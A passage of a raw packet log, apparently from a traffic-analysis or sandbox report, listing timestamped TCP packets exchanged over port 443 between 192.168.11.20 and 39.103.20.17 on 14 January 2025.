                                                                        Jan 14, 2025 05:11:08.337991953 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.338807106 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.339059114 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.339931011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.340221882 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.341154099 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.341377020 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.342004061 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.342217922 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.342417002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.343008041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.343230963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.344285965 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.344556093 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.345339060 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.345560074 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.346712112 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.346935034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.346956015 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.347285986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.347610950 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.347814083 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.349036932 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.349260092 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.349437952 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.349761963 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.349987984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.350480080 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.350652933 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.350652933 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.352025032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.352418900 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.352933884 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.353552103 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.353552103 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.354388952 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.354654074 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.355346918 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.355907917 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.356106997 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.356440067 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.357384920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.358177900 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.358572006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.359204054 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.359889984 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.360106945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.360129118 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.360621929 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.360755920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.361332893 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.361604929 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.361624956 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.361802101 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.362035990 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.362988949 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.363351107 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.364198923 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.364418983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.364418983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.365377903 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.365590096 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.365942001 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.366166115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.366166115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.366712093 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.366884947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.368004084 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.368235111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.368256092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.368526936 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.369390011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.369668007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.370208979 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.370481968 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.371128082 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.371352911 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.372390032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.372608900 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.373280048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.373508930 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.374634027 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.375034094 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.375674963 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.375890970 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.376349926 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.376733065 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.376754999 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.377100945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.377502918 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.377790928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.378454924 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.378835917 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.378859043 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.379089117 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.379667997 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.380029917 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.380362988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.380631924 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.381488085 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.381707907 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.382621050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.383371115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.384030104 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.384478092 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.384793997 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.385471106 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.385493040 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.385512114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.386023998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.386955023 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.387150049 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.387320995 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.387931108 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.388290882 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.389132023 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.389844894 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.390064955 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.390084982 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.390254974 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.390818119 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.391175985 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.391194105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.391369104 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.391983986 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.392184019 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.393003941 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.393227100 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.393243074 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.393472910 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.394193888 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.394484997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.394968033 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.395190954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.395190954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.395817995 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.396032095 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.396970034 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.397197008 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.397197008 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.397793055 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.397969007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.399208069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.399432898 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.399451017 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.399678946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.400044918 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.400243998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.401166916 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.401384115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.401397943 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.401628017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.401953936 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.402158976 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.402661085 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.402883053 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.404170990 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.404391050 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.405011892 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.405236006 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.405236006 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.406172037 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.406399965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.406882048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.407099962 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.407099962 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.407562017 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.407815933 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.409049988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.409621954 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.409913063 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.410142899 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.411036968 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.411448002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.411464930 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.411844969 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.412203074 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.412204027 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.412220001 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.412632942 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.413078070 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.413094044 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.413556099 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.413866997 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.414269924 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.414928913 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.415369034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.415942907 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.416521072 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.416836023 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.417130947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.417632103 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.417856932 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.419090033 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.419315100 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.420082092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.420403957 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.421158075 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.421459913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.421768904 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.422241926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.423307896 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.423541069 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.423557043 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.423825026 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.424237013 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.424237013 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.424252987 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.425018072 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.425512075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.425528049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.425707102 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.425949097 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.426495075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.426635981 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.426853895 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.426868916 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.427443027 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.427778006 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.428379059 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.428724051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.428951025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.429050922 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.430027008 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.430618048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.430951118 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.431248903 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.431503057 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.431782007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.432838917 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.433063030 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.433063030 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.433943033 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.434134960 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.434587955 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.434811115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.434811115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.435534954 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.435739040 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.436779976 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.436999083 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.437015057 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.437243938 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.437271118 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.437472105 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.438795090 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.439414978 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.439635992 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.439651012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.439817905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.440149069 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.440534115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.440547943 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.440732002 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.441279888 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.441479921 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.442208052 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.442653894 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.442668915 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.443039894 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.443367958 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.443669081 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.444129944 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.444596052 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.444976091 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.445688963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.446008921 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.446747065 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.447004080 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.447226048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.448029995 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.448329926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.448345900 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.448712111 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.448745966 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.448998928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.449795008 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.450015068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.450999022 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.451221943 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.451656103 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.451878071 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.451878071 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.452728987 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.452920914 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.453427076 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.453651905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.454716921 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.454933882 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.455292940 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.455533981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.456181049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.456475973 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.457681894 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.457902908 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.457902908 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.458250046 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.458498001 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.459404945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.459626913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.459626913 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.460031033 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.460527897 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.460896969 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.461400032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.461400986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.462116003 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.462516069 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.462918997 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.463320017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.463812113 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.464123011 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.464679956 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.465248108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.465539932 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.465759039 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.466782093 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.467462063 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.467477083 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.467674017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.468314886 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.468808889 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.469343901 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.469835997 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.469851017 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.470222950 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.470372915 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.470843077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.471535921 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.471879959 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.471894979 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.472275019 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.473175049 CET4434975939.103.20.17192.168.11.20
